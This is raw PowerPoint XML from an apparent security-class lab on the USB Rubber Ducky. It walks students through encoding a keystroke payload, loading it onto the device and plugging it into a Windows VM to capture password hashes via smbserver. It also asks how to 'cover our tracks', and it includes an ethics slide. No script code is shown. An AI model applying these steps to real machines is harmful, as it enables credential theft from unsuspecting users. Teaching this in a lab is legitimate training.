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69" r:id="rId8"/>
    <p:sldId id="270" r:id="rId9"/>
    <p:sldId id="271"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0" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="84"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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1694097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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="593466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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4069816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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3950722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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2764002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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3767238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79C480-D30A-4921-963C-20115989D6A4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/6/2017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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196788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79C480-D30A-4921-963C-20115989D6A4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/6/2017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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2352009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79C480-D30A-4921-963C-20115989D6A4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/6/2017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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="705072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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227986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79C480-D30A-4921-963C-20115989D6A4}"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B2A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1194594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79C480-D30A-4921-963C-20115989D6A4}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/6/2017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A995-CAD6-435A-94F0-A9A4D3EFDC33}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3037039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ucktoolkit.com/encod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youtu.be/BH4M7djZfew"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github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscrip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ucktoolkit.com/encod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CoreSecurity/impacke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0057" y="329692"/>
            <a:ext cx="9227083" cy="1088039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rubber Ducky Advance Labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1817148" y="1357528"/>
            <a:ext cx="8427308" cy="570126"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password Hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 6" descr="https://cdn.shopify.com/s/files/1/0068/2142/products/ducky2_f1b0a02f-00e3-49b8-9630-247258ba12f4.jpg?v=14942960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9675" y="1995847"/>
            <a:ext cx="6367849" cy="4502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356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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Once you're ready with the script you will need to convert that into a .bin (binary) file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>For this conversion you can either use following link or you can download encoder for rubber ducky.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>url: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ducktoolkit.com/encoder/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>In order to generate the payload click on ‘generate payload’ on the right side of the screen, then click on the file called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inject.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>, which will initiate the download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2861167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 Continued</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4954116"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>When you have the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inject.bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>’ file downloaded, we need to transfer the file into microSD card using the microSD to USB card reader. (See below)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Once, finished, insert the microSD card into the rubber ducky and connect the ducky to the target machine (In this lab connect the ducky to the Windows machine and do not forget to select Windows VM machine before connecting Ducky, cause before you were working on Kali VM machine and if you connect Ducky to your machine it will run in Kali. To avoid this and successfully attack Windows machine and grab the password hashes, select Windows VM machine). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>The script will automatically run and once you connect the ducky it will start ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>smbserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>’ and grabs the password hashes within 2-3 seconds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Video tutorial link = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>youtu.be/BH4M7djZfew</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Image result for microsd to us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7706" y="2446637"/>
            <a:ext cx="1136822" cy="1136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025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Improve the code on your own</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if we wanted to use Windows machine as an attacker?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Instead of minimizing the file explorer, how can we close that window to cover our tracks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remember, we can only use the keyboard.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1880372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What’s next?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can you think of how to create a script when you can’t use the mouse?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every Ducky script must be created with this principle in mind.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make sure that you are thinking about every single keystroke.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3168995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749" y="63121"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Required Materials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351639" y="1388684"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1 Windows PC (Windows 7 or newer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VMware Workstation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USB Rubber Ducky (can be obtained from staff)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MicroSD to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>USB reader (can be obtained from staff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WARNING! DO NOT plug in Rubber Ducky directly to your machine. First check the MicroSD card using card reader, ‘right click’ on drive and select ‘quick format’, then click ‘start.’ You do not know who was using this device before you, or what payload may remain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ENJOY USING THE RUBBER DUCKY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Estimated Time to Complete: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>60 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for rubber ducky scripting langu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9058" y="3961790"/>
            <a:ext cx="52387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90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02" y="22185"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Rubber Ducky?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534154" y="1388937"/>
            <a:ext cx="10819646" cy="4788026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The USB Rubber Ducky is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>powerful keystroke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>injection tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>that can be disguised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>an ordinary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>flash drive.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Computers recognize it as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>keyboard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and accept pre-programmed keystroke payloads at over 1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>keystrokes per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>minute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Payloads can be created using a simple scripting language that issues one command per line. For example, one command is ‘TAB’ which mimics using the TAB key, or another example of a command is ‘STRING hello world!’, which types/prints “hello world!” The full list of Windows commands and descriptions can be found here: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every computer (Desktop, Laptops, Tablets &amp; Smartphones) takes input from a keyboard. This is why the Rubber Ducky USB device, which works as a Human Interface Device (HID), is automatically detected by operating systems. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for rubber duck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40785" y="22185"/>
            <a:ext cx="1622360" cy="162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485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0"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Ethics – Doing the Right Thing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1552755"/>
            <a:ext cx="11442700" cy="4624208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The information and skills learned and taught in this lab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> maliciously.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Never forget that cyber attacks/hacks no matter the intent are a serious crime, if convicted you can go to Federal prison!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(ISC)2 Code of ethics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-Protect society, the commonwealth, and the infrastructure. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
